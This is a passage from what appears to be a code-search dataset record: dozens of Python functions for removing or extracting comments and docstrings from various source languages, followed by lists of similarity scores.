comments))\n # regex to remove section markers and extraneous tabs\n # left over by poor reading of files\n comments = [re.sub('([-=].*[-=]|\\t)', '', line) for line in comments]\n comments = list(filter(lambda x: x != '', comments))\n return comments", "def remove_html_comments(html): # Grunt uses comments to as build arguments, bad practice but still.\n log.debug(\"\"\"Removing all unnecessary HTML comments; Keep all containing:\n 'build:', 'endbuild', '<!--[if]>', '<![endif]-->' for Grunt/Grymt, IE.\"\"\")\n return re.compile('<!-- [^(build|endbuild)].*? -->', re.I).sub('', html)", "def comment_remover(string):\n def replacer(match):\n s = match.group(0)\n if s.startswith('/'):\n return \" \" # note: a space and not an empty string\n else:\n return s\n pattern = re.compile(\n r'//.*?$|/\\*.*?\\*/|\\'(?:\\\\.|[^\\\\\\'])*\\'|\"(?:\\\\.|[^\\\\\"])*\"',\n re.DOTALL | re.MULTILINE\n )\n return re.sub(pattern, replacer, string)", "def __remove_c_comments(self, line):\n new_chars = []\n i = 0\n while i < len(line):\n blocks = self.__ingest_c_block_comments(line, i)\n if blocks > 0:\n i += blocks\n continue\n\n whitespace = self.__ingest_whitespace(line, i)\n if whitespace > 0:\n new_chars.append(' ')\n i += whitespace\n continue\n\n comm_start = self.__ingest_c_comment_start(line, i)\n if comm_start == -1:\n new_chars.append(' ')\n break\n elif comm_start > 0:\n new_chars.append(' ')\n i += comm_start\n\n if blocks + whitespace + comm_start == 0:\n new_chars.append(line[i])\n i += 1\n\n new_line = ''.join(new_chars)\n return new_line", "def remove_comments_from_line(self, line):\n comment_start = line.find('$')\n if (comment_start >= 0):\n line = line[:comment_start]\n return line.lower()", "def remove_html_comment(html_data):\n html_data = re.compile('<!--(.*?)-->', re.MULTILINE|re.DOTALL).sub(\"\", html_data)\n return html_data", "def getComments(source):\n\n markup = []\n for f in source:\n markup += extractMarkup(f)\n\n docs = collateDocs(markup)\n return docs", "def __remove_fortran_comments(self, line):\n if self._in_block_comment:\n log.error('Before Fortran line is processed, in a block comment?')\n\n new_chars = []\n line_len = len(line)\n ignore_spaces = False\n for i in range(line_len):\n if line[i] == ' ':\n if not ignore_spaces:\n ignore_spaces = True\n new_chars.append(' ')\n elif line[i] == '!':\n new_chars.append(' ')\n break\n else:\n ignore_spaces = False\n new_chars.append(line[i])\n\n if self._in_block_comment:\n log.error('Processing Fortran comment left state in a block comment?')\n\n new_line = ''.join(new_chars)\n return new_line", "def extract_comment_py():\n debug(\"extract comment from a python script.\")\n for line in CURRENT_BUFFER[:3]:\n if re.search(r\"coding[:=]\\s*([-\\w.]+)\", line):\n pattern = re.compile(r\"coding[:=]\\s*(?P<encoding>[-\\w.]+)\")\n globals()['ENCODING'] = pattern.search(line).group('encoding')\n debug(\"found encoding: %s\" % globals()['ENCODING'])\n\n lines = list(CURRENT_BUFFER)\n for (i, iline) in enumerate(lines[:10]):\n # find \"\"\" or ''' in the first few lines.\n if '\"\"\"' in iline or \"'''\" in iline:\n # find the end of it.\n breaker = '\"\"\"' if '\"\"\"' in iline else \"'''\"\n for j, jline in enumerate(lines[i+1:]):\n if breaker in jline:\n # found it, format the comment a little bit.\n if j == 0:\n # in the same line, this is a one line comment.\n return [jline[jline.index(breaker)+3:jline.rindex(breaker)]]\n else:\n lines[i] = lines[i][lines[i].index(breaker)+3:]\n lines[i+j+1] = 
lines[i+j+1][:lines[i+j+1].rindex(breaker)]\n return lines[i:i+j+1]\n else:\n # end of the comment is not found.\n return\n else:\n # comment might start with #\n return extract_comment_sh(python_style=True)", "def unMarkupCommentsAndStrings(self, content):\n\n def replaceMarkups(match):\n groupdict = match.groupdict()\n if groupdict[\"str\"] is not None:\n return self.strings[int(match.group(\"str\"))]\n elif groupdict[\"comment\"] is not None:\n return self.comments[int(match.group(\"comment\"))]\n else:\n assert False\n\n unMarkedup = markups.sub(replaceMarkups, content)\n\n return unMarkedup", "def skip_comments(filepointer):\n\tcomments = []\n\tdata = '#'\n\ttry:\n\t\tpos = filepointer.tell()\n\texcept:\n\t\tprint(\"Could not read file.\")\n\t\treturn None\t\n\t\n\twhile data[0] == '#':\n\t\tdata = filepointer.readline()\n\t\tif not data:\n\t\t\traise Exception(\"Unexpected end of file while reading comments.\")\n\n\t\tif data[0] == '#':\n\t\t\tcomments.append(data)\n\t\t\tpos = filepointer.tell()\n\t\telse:\n\t\t\tfilepointer.seek(pos)\n\treturn comments", "def strip(self, src):\r\n # single-quoted character\r\n p = \"('.')\"\r\n \r\n # double-quoted string\r\n p += \"|(\\\"(?:[^\\\"\\\\\\\\]|\\\\\\\\.)*\\\")\"\r\n \r\n # single and multi-line comment\r\n p += \"|(//.*?$)|(/\\\\*[^*]*(?:\\\\*(?!/)[^*]*)*\\\\*/)\"\r\n \r\n # pre-processor directive\r\n p += \"|\" + \"(^\\\\s*#.*?$)\"\r\n\r\n regex = re.compile(p, re.MULTILINE)\r\n return regex.sub(' ', src)", "def extract_comment_sh(python_style=False):\n if not python_style:\n debug(\"extract comment from a shell script.\")\n lines = list(CURRENT_BUFFER)\n if lines[0].startswith(\"#!\"):\n lines = lines[1:]\n\n if python_style and re.search(r\"coding[:=]\\s*([-\\w.]+)\", lines[0]):\n # strip encoding line.\n lines = lines[1:]\n\n for i, line in enumerate(lines):\n if not line.startswith(\"#\"):\n break\n else:\n i += 1\n return [line.lstrip(\"# \") for line in lines[:i]]", "def _parse_comments(reader):\n regex = r'\\s*(#|\\/{2}).*$'\n regex_inline = r'(:?(?:\\s)*([A-Za-z\\d\\.{}]*)|((?<=\\\").*\\\"),?)(?:\\s)*(((#|(\\/{2})).*)|)$'\n\n pipe = []\n for line in reader:\n if re.search(regex, line):\n if re.search(r'^' + regex, line, re.IGNORECASE): continue\n elif re.search(regex_inline, line):\n pipe.append(re.sub(regex_inline, r'\\1', line))\n else:\n pipe.append(line)\n return \"\\n\".join(pipe)", "def dedent(comment):\n commentLines = comment.split('\\n')\n if len(commentLines) < 2:\n cleaned = list(map(str.lstrip, commentLines))\n else:\n spc = 0\n for char in commentLines[1]:\n if char in string.whitespace:\n spc = spc + 1\n else:\n break\n #now check other lines\n cleaned = []\n for line in commentLines:\n for i in range(min(len(line),spc)):\n if line[0] in string.whitespace:\n line = line[1:]\n cleaned.append(line)\n return '\\n'.join(cleaned)", "def hide_magic(source: str) -> str:\n\n def _hide_magic_line(line: str) -> str:\n return f\"###MAGIC###{line}\" if contains_magic(line) else line\n\n return \"\\n\".join(_hide_magic_line(line) for line in source.split(\"\\n\"))", "def _PreParse(line: str) -> str:\n line = line.rstrip(\"\\n\")\n\n commentIndex = line.find(\"/\")\n\n # no comment found\n if commentIndex == - 1:\n return line\n\n # truncate\n return line[0:commentIndex]", "def cleanup_code( content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def removeComment(line):\n ind = 
line.find('%')\n while True:\n if ind < 0:\n return line\n elif (ind > 0 and line[ind-1] != '\\\\') or ind == 0:\n break\n else:\n ind = line.find('%', ind+1)\n return line[:ind]", "def test_remove_single_line_comments_annotation():\n\n\tinput_ = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t//comment\n\t\t\t\t//@Test //comment\n\t\t\t\t//comment\n\t\t\t\tline3 \"\"\"\n\n\texpect = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t\n\t\t\t\t//@Test //comment\n\t\t\t\t\n\t\t\t\tline3 \"\"\"\n\n\tassert aunit.remove_single_line_comments(input_) == expect", "def listFromLines(lines):\n reComment = re.compile('#.*')\n temp = [reComment.sub('',x).strip() for x in lines.split('\\n')]\n temp = [x for x in temp if x]\n return temp", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n # remove `foo`\n return content.strip('` \\n')", "def clean_code(ls):\r\n ls = remove_white_space(ls)\r\n ls = remove_comments(ls)\r\n ls = remove_empty_lines(ls)\r\n\r\n return ls", "def strip_comment_line_with_symbol(line, start): # pragma: no cover\n parts = line.split(start)\n counts = [len(re.findall(r'(?:^|[^\"\\\\]|(?:\\\\\\\\|\\\\\")+)(\")', part))\n for part in parts]\n total = 0\n for nr, count in enumerate(counts):\n total += count\n if total % 2 == 0:\n return start.join(parts[:nr + 1]).rstrip()\n else: # pragma: no cover\n return line.rstrip()", "def clean_docstring(doc: str, unused: Literal[\"pre\", \"post\"] = None) -> str:\n doc = doc.split(\"\\n\")\n if unused == \"pre\":\n try:\n index = next(i for i, l in enumerate(doc) if l.strip())\n doc = doc[index:]\n except StopIteration:\n doc = []\n elif unused == \"post\":\n try:\n index = next(i for i, l in enumerate(reversed(doc)) if l.strip())\n doc = doc[: len(doc) - index]\n except StopIteration:\n doc = []\n if doc:\n first_line = doc[0]\n index = len(first_line) - len(first_line.lstrip())\n indent = first_line[:index]\n if all(l.startswith(indent) for l in doc if l.strip()):\n doc = [(l[index:] if l.strip() else l) for l in doc]\n return \"\\n\".join(doc)", "def getcomments(object):\r\n try:\r\n lines, lnum = findsource(object)\r\n except (IOError, TypeError):\r\n return None\r\n\r\n if ismodule(object):\r\n # Look for a comment block at the top of the file.\r\n start = 0\r\n if lines and lines[0][:2] == '#!': start = 1\r\n while start < len(lines) and string.strip(lines[start]) in ('', '#'):\r\n start = start + 1\r\n if start < len(lines) and lines[start][:1] == '#':\r\n comments = []\r\n end = start\r\n while end < len(lines) and lines[end][:1] == '#':\r\n comments.append(string.expandtabs(lines[end]))\r\n end = end + 1\r\n return string.join(comments, '')\r\n\r\n # Look for a preceding block of comments at the same indentation.\r\n elif lnum > 0:\r\n indent = indentsize(lines[lnum])\r\n end = lnum - 1\r\n if end >= 0 and string.lstrip(lines[end])[:1] == '#' and \\\r\n indentsize(lines[end]) == indent:\r\n comments = [string.lstrip(string.expandtabs(lines[end]))]\r\n if end > 0:\r\n end = end - 1\r\n comment = string.lstrip(string.expandtabs(lines[end]))\r\n while comment[:1] == '#' and indentsize(lines[end]) == indent:\r\n comments[:0] = [comment]\r\n end = end - 1\r\n if end < 0: break\r\n comment = string.lstrip(string.expandtabs(lines[end]))\r\n while comments and string.strip(comments[0]) == '#':\r\n comments[:1] = []\r\n while comments and string.strip(comments[-1]) == '#':\r\n comments[-1:] = []\r\n return string.join(comments, '')", "def stripText(self, 
rawText):\n strippedText = []\n for line in rawText:\n if line.rstrip():\n if line[0] != '#':\n strippedText.append(line.rstrip()) #also remove newline character\n return strippedText", "def _RemoveStaleComments(content: str) -> str:\n for match in STALE_GROUP_COMMENT_REGEX.findall(content):\n content = content.replace(match, '')\n\n return content", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def toggle_comment(self):\n r = vim.current.range\n rlen = r.end - r.start + 1\n ac = self.all_comment(r, 0, rlen)\n for i in range(0, rlen):\n r[i] = r[i].replace(self._cstr, '')\n if not ac:\n for i in range(0, rlen):\n r[i] = re.sub(r'^(\\s*)', r'\\1{0}'.format(self._cstr), r[i])", "def cleanup_code(self, content):\n\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n if content[-4] == '\\n':\n return '\\n'.join(content.split('\\n')[1:-1])\n return '\\n'.join(content.split('\\n')[1:]).rstrip('`')\n\n # remove `foo`\n return content.strip('` \\n')", "def minimize_source(source):\n if not isinstance(source, mitogen.core.UnicodeType):\n source = source.decode('utf-8')\n tokens = tokenize.generate_tokens(StringIO(source).readline)\n tokens = strip_comments(tokens)\n tokens = strip_docstrings(tokens)\n tokens = reindent(tokens)\n return tokenize.untokenize(tokens)", "def _parse_comment(i, doc):\n\n if doc[i].strip() != \"/**\":\n raise ParseFailure(i, \"Expected beginning of block comment\")\n\n e = i + 1\n while e < len(doc) and doc[e].strip() != \"*/\":\n e += 1\n\n return e + 1, [x.rstrip() for x in doc[i + 1: e]]", "def strip_comment_line_with_symbol(line, start):\n parts = line.split(start)\n counts = [len(re.findall(r'(?:^|[^\"\\\\]|(?:\\\\\\\\|\\\\\")+)(\")', part))\n for part in parts]\n total = 0\n for nr, count in enumerate(counts):\n total += count\n if total % 2 == 0:\n return start.join(parts[:nr + 1]).rstrip()\n else: # pragma: no cover\n return line.rstrip()", "def clean_comment(pair):\n pair = [remove_newlines(i) for i in pair]\n pair = [i.strip() for i in pair]\n # Remove colons\n pair[0] = pair[0].replace(':', '')\n # Remove excess whitespace\n whitespace_regex = re.compile('\\s\\s+')\n pair[1] = whitespace_regex.sub(' ', pair[1])\n return pair", "def skipComment(self):\r\n\t\tch = self.nextChar()\r\n\t\twhile ch and ch != \"\\n\":\r\n\t\t\tch = self.nextChar()", "def cleanup_code(self, content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def comment_cleaner(text):\n text = re.sub(\"[^\\w\\s]\", \"\", text)\n text = \" \".join([x.lower() for x in text.split(' ') if x.lower() in corpus and x.lower() not in stopwords and len(x) > 1])\n if text == '':\n return np.nan\n return text", "def parse_comment(comment: Union[Token, PsuedoToken]) -> str:\n # Happens when there is no documentation comment in the source file for the\n # item.\n spelling = comment.spelling\n if spelling is None:\n return \"\"\n\n # Comments from clang start at the '/*' portion, but if the comment itself\n # is indented subsequent lines will have too much indent.\n # Transform::\n #\n # \"/**\\n * hello some comment\\n * on multiple lines\\n */\"\n #\n # into::\n #\n # \"/**\\n * hello some comment\\n * on multiple lines\\n */\"\n indent = \" \" * (comment.extent.start.column - 
1)\n indented_comment = indent + spelling\n dedented_comment = textwrap.dedent(indented_comment)\n\n # Notes on the regex here.\n # Option 1 '\\s?\\*/?'\n # This piece will match comment lines that start with '*' or ' *'.\n # This will also match a trailing '*/' for the end of a comment\n #\n # Option 2 '^/\\*+<?'\n # This will match the start of a comment '/*' and consume any\n # subsequent '*'. This is also meant to catch '/**<' for trailing comments.\n #\n # Option 3 '\\*+/'\n # Matches any and all '*' up to the end of the comment string.\n contents = re.sub(\n r\"^\\s?\\*/?|^/\\*+<?|\\*+/\",\n lambda x: len(x.group(0)) * \" \",\n dedented_comment,\n flags=re.MULTILINE,\n )\n\n contents = textwrap.dedent(contents)\n\n # there may still be left over newlines so only strip those, but leave any\n # whitespaces.\n contents = contents.strip(\"\\n\")\n\n return contents", "def print_comments():\n with open('a_cpp_file.cpp', 'r') as file:\n data = file.read()\n to_print = ''\n should_print = False\n for i, char in enumerate(data):\n if i > 1:\n if data[i-1] == '*' and data[i-2] == '/':\n should_print = True\n if char == '*' and data[i+1] == '/' and should_print:\n should_print = False\n print(to_print)\n to_print = ''\n if should_print:\n to_print += char\n should_print = False\n for i, char in enumerate(data):\n if i > 1:\n if data[i-1] == '/' and data[i-2] == '/':\n should_print = True\n if char == '\\n' and should_print:\n should_print = False\n print(to_print)\n to_print = ''\n if should_print:\n to_print += char", "def stripped_lines(lines, ignore_comments, ignore_docstrings, ignore_imports):\n if ignore_imports:\n tree = astroid.parse(\"\".join(lines))\n node_is_import_by_lineno = (\n (node.lineno, isinstance(node, (astroid.Import, astroid.ImportFrom)))\n for node in tree.body\n )\n line_begins_import = {\n lineno: all(is_import for _, is_import in node_is_import_group)\n for lineno, node_is_import_group in groupby(\n node_is_import_by_lineno, key=lambda x: x[0]\n )\n }\n current_line_is_import = False\n\n strippedlines = []\n docstring = None\n for lineno, line in enumerate(lines, start=1):\n line = line.strip()\n if ignore_docstrings:\n if not docstring and any(\n line.startswith(i) for i in ['\"\"\"', \"'''\", 'r\"\"\"', \"r'''\"]\n ):\n docstring = line[:3]\n line = line[3:]\n if docstring:\n if line.endswith(docstring):\n docstring = None\n line = \"\"\n if ignore_imports:\n current_line_is_import = line_begins_import.get(\n lineno, current_line_is_import\n )\n if current_line_is_import:\n line = \"\"\n if ignore_comments:\n line = line.split(\"#\", 1)[0].strip()\n strippedlines.append(line)\n return strippedlines", "def test_dislike_a_comment(self):\n self.base_test()", "def process_comment(self, data):\r\n if not self.is_suppress:\r\n return [data]", "def make_comment(self, input, start, end, elements):\n return elements[1].text.strip('{}')", "def trim_comment(line):\n if ';' not in line:\n return (line, None)\n\n comment_start = line.index(';')\n before_comment = line[:comment_start]\n spaces_before_comment = len(before_comment) - len(before_comment.rstrip())\n comment = line[comment_start:]\n return (before_comment.rstrip(), spaces_before_comment * ' ' + comment)", "def sanitize_comment(comment):\n\n if hasattr(settings, \"BLEACH_ALLOWED_TAGS\"):\n allowed_tags = settings.BLEACH_ALLOWED_TAGS\n else:\n allowed_tags = bleach.sanitizer.ALLOWED_TAGS\n\n return bleach.clean(comment, tags=allowed_tags, strip=True)", "def remove_curl_debug_lines(text: str) -> str:\n lines = 
text.split(\"\\n\")\n lines = [line for line in lines if not line.startswith(\"**\")]\n return \"\\n\".join(lines)", "def clean(text):\n lines = text.split('\\n')\n\n indx = range(len(lines))\n indx.reverse()\n for i in indx:\n temp = lines[i].strip()\n if temp == '' or temp.startswith('#'):\n del lines[i]\n else:\n lines[i] = temp\n\n return lines", "def clean_tinymce(input):\n result = input\n result = result.replace(u'<#document-fragment>', u'') # A strange bug that the NIVE client experiences but that we can't reproduce.\n result = result.replace(u'&lt;#document-fragment&gt;', u'') # A strange bug that the NIVE client experiences but that we can't reproduce.\n result = html_comments.sub(u'', result)\n return result", "def block_comments(code):\n block = list()\n for line in code:\n if bool(line.strip()): # If line is not empty\n if line.strip()[0] == '!': # If the first character of the string is the start of a comment it adds it\n block.append(identify_comment(line))\n elif bool(line.strip()): # If the first character of the string is not the start of a comment or its not empty it exits\n break\n return block", "def getHTMLComments(self, text):\n return self.doSpecial(text, '<!--', '-->', self.fParseHTMLComments)", "def remove_comments(ctx, files):\n # CD into Salt's repo root directory\n ctx.cd(CODE_DIR)\n\n # Unfortunately invoke does not support nargs.\n # We migth have been passed --files=\"foo.py bar.py\"\n # Turn that into a list of paths\n _files = []\n for path in files:\n if not path:\n continue\n _files.extend(path.split())\n if not _files:\n utils.exit_invoke(0)\n\n _files = [\n pathlib.Path(fname).resolve() for fname in _files if fname.endswith(\".py\")\n ]\n\n fixes = 0\n exitcode = 0\n comments_regex = re.compile(r\"^# ([I|i])mports? 
.*(([L|l])ibs?)?\\n\", re.MULTILINE)\n for path in _files:\n contents = path.read_text()\n fixed = comments_regex.sub(\"\", contents)\n if fixed == contents:\n continue\n fixes += 1\n exitcode = 1\n path.write_text(fixed)\n if exitcode:\n utils.error(\"Fixed {} files\", fixes)\n utils.exit_invoke(exitcode)", "def docstring_hack():\n pass", "def _preprocess(self, source):\n source = source.replace(u'\\n', u'').strip()\n source = re.sub(r'<br\\s*\\/?\\s*>', u' ', source, re.I)\n source = re.sub(r'\\s\\s+', u' ', source)\n return source", "def lines(filename, exclude_imports=True, exclude_comments=True, exclude_tests=True, exclude_globals=True, exclude_blank=True, verbose=False, is_c=False, s=None):\n if s is None:\n s = open(filename, 'rt').read()\n\n L = s.split('\\n')\n \n # Hack to strip out triple and single quote string lines in a heuristic (unreliable) way, which avoids parsing Cython\n if not is_c:\n for i in range(len(L)):\n if L[i].strip().startswith(\"'\") and L[i].strip().endswith(\"'\"):\n L[i] = ''\n i = 0\n while i < len(L):\n found = False\n for triple_quote in ['\"\"\"', \"'''\"]:\n if L[i].strip().startswith(triple_quote):\n L[i] = L[i].strip()[3:]\n for j in range(i, len(L)):\n if triple_quote in L[j]:\n found = True\n L[j] = ''\n if found:\n break\n i = j+1\n if not found:\n i += 1\n else:\n begin_comment = '/*'\n end_comment = '*/'\n i = 0\n while i < len(L):\n found = False\n if begin_comment in L[i]:\n rest = L[i][L[i].index(begin_comment)+len(begin_comment):]\n L[i] = L[i][:L[i].index(begin_comment)]\n if end_comment in rest:\n found = True\n i += 1\n else:\n for j in range(i+1, len(L)):\n if end_comment in L[j]:\n found = True\n L[j] = L[j][L[j].index(end_comment)+len(end_comment):]\n else:\n L[j] = ''\n if found:\n break\n i = j + 1\n if not found:\n i += 1\n\n# util.print_header('Lines before exclude_tests:' + filename, '\\n'.join(L))\n\n # Hack to strip out def test() and other methods in a heuristic (unreliable) way, which avoids parsing Cython\n if exclude_tests:\n # Also exclude makeColorMatrix so that our camera pipe is apples-to-apples comparable with reported lines in Halide paper\n if not is_c:\n methods = 'test run_test_all mandelbrot_gray mandelbrot_color composite_numpy composite_numexpr makeColorMatrix'.split()\n else:\n methods = ['int main', 'void main']\n i = 0\n while i < len(L):\n L_i_strip = L[i].strip()\n if ((not is_c and (any(L_i_strip.startswith('def ' + method) for method in methods) or\n any(L_i_strip.startswith('cdef ' + method) for method in methods))) or\n (is_c and (any(L_i_strip.startswith(method) for method in methods)))):\n L[i] = ''\n for j in range(i+1, len(L)):\n L_j_strip = L[j].strip()\n c_ok = True\n if is_c:\n c_ok = L_j_strip != '{' and L_j_strip != '}'\n if not L[j].startswith(' ') and not L[j].startswith('\\t') and not len(L[j].strip()) == 0 and c_ok:\n break\n else:\n L[j] = ''\n i = j\n elif (L[i].strip().startswith('test(') or L[i].strip().startswith('run_test_all(')) and not is_c:\n L[i] = ''\n i += 1\n else:\n i += 1\n\n# util.print_header('Lines before exclude_imports:' + filename, '\\n'.join(L))\n if exclude_imports:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('import') and not x.lstrip().startswith('cimport') and not x.startswith('cdef extern')]\n else:\n L = [x for x in L if not x.lstrip().startswith('#include')]\n# util.print_header('Lines before exclude_comments:' + filename, '\\n'.join(L))\n if exclude_comments:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('#') and not 
x.strip() == 'pass']\n else:\n L = [x for x in L if not x.lstrip().startswith('//')]\n# util.print_header('Lines before exclude_globals:' + filename, '\\n'.join(L))\n if exclude_globals and not is_c:\n L = [x for x in L if (x.startswith(' ') or x.startswith('\\t') or x.startswith('def') or x.startswith('cdef')) and (not x.lstrip().startswith('has_'))]\n# util.print_header('Lines before exclude_blank:' + filename, '\\n'.join(L))\n\n if is_c:\n # Also exclude makeColorMatrix so that C camera pipe is apples-to-apples comparable with reported lines in Halide paper\n L = [x for x in L if not x.lstrip().startswith('matrix_3200') and not x.lstrip().startswith('matrix_7000')]\n if exclude_blank:\n L = [x for x in L if not len(x.strip()) == 0]\n\n if verbose:\n util.print_header('Final lines for:' + filename, '\\n'.join(L))\n\n return len(L)", "def parse_code_comment(self, filepath):\n raise NotImplementedError('Not Implemented')", "def _clean_message(comment):\n message = comment['message']\n # Remove comments with linked persons (they mostly contain only emojis)\n if 'message_tags' in comment:\n for tag in comment['message_tags']:\n if 'type' in tag and tag['type'] == 'user':\n message = message.replace(tag['name'], '')\n # Remove links\n message = re.sub(r'http\\S+', '', message)\n return message.strip()", "def test_comments(self):\n fp = FilePath(self.mktemp())\n fp.setContent('something\\n#commented\\ncool')\n self.assertEqual(list(inventoryReader(fp.path)), ['something', 'cool'])", "def implement(self):\n\t#@DEBUG remove comments", "def skip(self):\n input = self.source\n startLine = self.line\n\n # Whether this is the first called as happen on start parsing a file (eat leading comments/white space)\n startOfFile = self.cursor is 0\n \n indent = \"\"\n \n while (True):\n if len(input) > self.cursor:\n ch = input[self.cursor]\n else:\n return\n \n self.cursor += 1\n \n if len(input) > self.cursor:\n next = input[self.cursor]\n else:\n next = None\n\n if ch == \"\\n\" and not self.scanNewlines:\n self.line += 1\n indent = \"\"\n \n elif ch == \"/\" and next == \"*\":\n self.cursor += 1\n text = \"/*\"\n inline = startLine == self.line and startLine > 1\n commentStartLine = self.line\n if startLine == self.line and not startOfFile:\n mode = \"inline\"\n elif (self.line-1) > startLine:\n # distance before this comment means it is a comment block for a whole section (multiple lines of code)\n mode = \"section\"\n else:\n # comment for maybe multiple following lines of code, but not that important (no visual white space divider)\n mode = \"block\"\n \n while (True):\n try:\n ch = input[self.cursor]\n self.cursor += 1\n except IndexError:\n raise ParseError(\"Unterminated comment\", self.fileId, self.line)\n \n if ch == \"*\":\n next = input[self.cursor]\n if next == \"/\":\n text += \"*/\"\n self.cursor += 1\n break\n \n elif ch == \"\\n\":\n self.line += 1\n \n text += ch\n \n \n # Filter escaping on slash-star combinations in comment text\n text = text.replace(\"*\\/\", \"*/\")\n \n try:\n self.comments.append(Comment.Comment(text, mode, commentStartLine, indent, self.fileId))\n except Comment.CommentException as commentError:\n Console.error(\"Ignoring comment in %s: %s\", self.fileId, commentError)\n \n \n elif ch == \"/\" and next == \"/\":\n self.cursor += 1\n text = \"//\"\n if startLine == self.line and not startOfFile:\n mode = \"inline\"\n elif (self.line-1) > startLine:\n # distance before this comment means it is a comment block for a whole section (multiple lines of code)\n mode = 
\"section\"\n else:\n # comment for maybe multiple following lines of code, but not that important (no visual white space divider)\n mode = \"block\"\n \n while (True):\n try:\n ch = input[self.cursor]\n self.cursor += 1\n except IndexError:\n # end of file etc.\n break\n\n if ch == \"\\n\":\n self.line += 1\n break\n \n text += ch\n \n try:\n self.comments.append(Comment.Comment(text, mode, self.line-1, \"\", self.fileId))\n except Comment.CommentException:\n Console.error(\"Ignoring comment in %s: %s\", self.fileId, commentError)\n\n # check for whitespace, also for special cases like 0xA0\n elif ch in \"\\xA0 \\t\":\n indent += ch\n\n else:\n self.cursor -= 1\n return", "def extract_docstring(loaded):\n\n source = loaded['cells'][0]['source']\n\n assert source[0].strip() == '\"\"\"'\n assert source[-1].strip() == '\"\"\"'\n\n return ' '.join(i.strip() for i in source[1:-1])" ]
[ "0.75588655", "0.75129175", "0.749204", "0.73860633", "0.73546356", "0.7324829", "0.72374445", "0.71416444", "0.711339", "0.6960461", "0.6960461", "0.6952356", "0.6892819", "0.68833077", "0.6868674", "0.6861091", "0.6856785", "0.676051", "0.67446506", "0.6728799", "0.6727674", "0.6724714", "0.6707175", "0.66807467", "0.667315", "0.6668189", "0.66435033", "0.66254854", "0.66162", "0.66085774", "0.65951186", "0.65736073", "0.6537083", "0.6528689", "0.6515998", "0.64742666", "0.64642775", "0.6441234", "0.64359754", "0.64288074", "0.64198416", "0.641012", "0.6405897", "0.63365793", "0.63111144", "0.6298483", "0.6292943", "0.6274877", "0.6268455", "0.6268124", "0.6256677", "0.6255419", "0.6241036", "0.62279487", "0.62170583", "0.6208556", "0.6169485", "0.6161645", "0.6148886", "0.61455697", "0.6142864", "0.61210024", "0.61108273", "0.60958654", "0.60682625", "0.6030614", "0.602931", "0.60185385", "0.6000323", "0.59986377", "0.5991848", "0.59819514", "0.5981819", "0.59790814", "0.5970963", "0.5939837", "0.5939558", "0.5939266", "0.593707", "0.59115154", "0.5883732", "0.58800626", "0.5875241", "0.58733565", "0.586912", "0.58522767", "0.5840889", "0.5834861", "0.58315915", "0.58189857", "0.5814354", "0.58114666", "0.578702", "0.5765274", "0.5763269", "0.5757027", "0.5742677", "0.57408607", "0.57307595", "0.5723984" ]
0.6970854
9
Returns the total line count, nonblank line count, and net line count excluding comments and docstrings
def loc(blob, delim='#'):
    total = get_line_count(blob)
    blob = strip_blanklines(blob)
    nonblank = get_line_count(blob)
    blob = strip_docstring(blob)
    blob = strip_comments(blob, delim)
    net = get_line_count(blob)
    num_inputs = len([m.start() for m in re.finditer('input ?\(', blob)])
    return {'total': total, 'nonblank': nonblank, 'net': net, 'num_inputs': num_inputs}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 11)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[0], 4)", "def get_total_line_counts(self):\n return get_total_line_counts(self.files.all())", "def get_linecount(self):\n self._update_linetab(len(self.input))\n lcount = len(self.__linepos)\n return lcount - (self.input.endswith('\\n'))", "def calculate_line_number(text):\n return len([line for line in text.split(\"\\n\") if line.strip() != \"\"])", "def linecount(x):\n return sum(1 for char in x if char == \"\\n\")", "def __len__(self):\n nlines = self.get_endline() - self.get_startline() + 1\n if nlines < 0:\n nlines = 0\n return nlines", "def _getOldCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"+\"):\n nb_lines += 1\n return nb_lines", "def n_lines(self):\n try: \n return self._n_lines\n except AttributeError:\n self._n_lines = len(self.lines())\n return self._n_lines", "def linecounter(x):\n return linecount(x) + longlines(x)", "def _getNewCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"-\"):\n nb_lines += 1\n return nb_lines", "def test_line_counts(self):\n diff = (\n b'+ This is some line before the change\\n'\n b'- And another line\\n'\n b'Index: foo\\n'\n b'- One last.\\n'\n b'--- README 123\\n'\n b'+++ README (new)\\n'\n b'@@ -1,1 +1,1 @@\\n'\n b'-blah blah\\n'\n b'-blah\\n'\n b'+blah!\\n'\n b'-blah...\\n'\n b'+blah?\\n'\n b'-blah!\\n'\n b'+blah?!\\n')\n files = DiffParser(diff).parse()\n\n self.assertEqual(len(files), 1)\n self.assertEqual(files[0].insert_count, 3)\n self.assertEqual(files[0].delete_count, 4)", "def no_of_lines():\n number_of_lines = len(open(FILE_NAME).readlines())\n return number_of_lines", "def num_lines(self, snapshot: Bug, filepath: str) -> int:\n return len(self._line_offsets(snapshot, filepath))", "def _count_comment_rows(vcf_path):\n vcf_lines_generator = lines_from_vcf(vcf_path)\n\n comment_lines_count = 0\n for line in vcf_lines_generator:\n if line.startswith('#'):\n comment_lines_count += 1\n else:\n vcf_lines_generator.close() # Don't leave the file handle opened\n # Don't continue reading the VCF once the comments section ended\n break\n\n return comment_lines_count", "def sentence_count(self):\n count = 0\n for line in self.lines:\n if '.' 
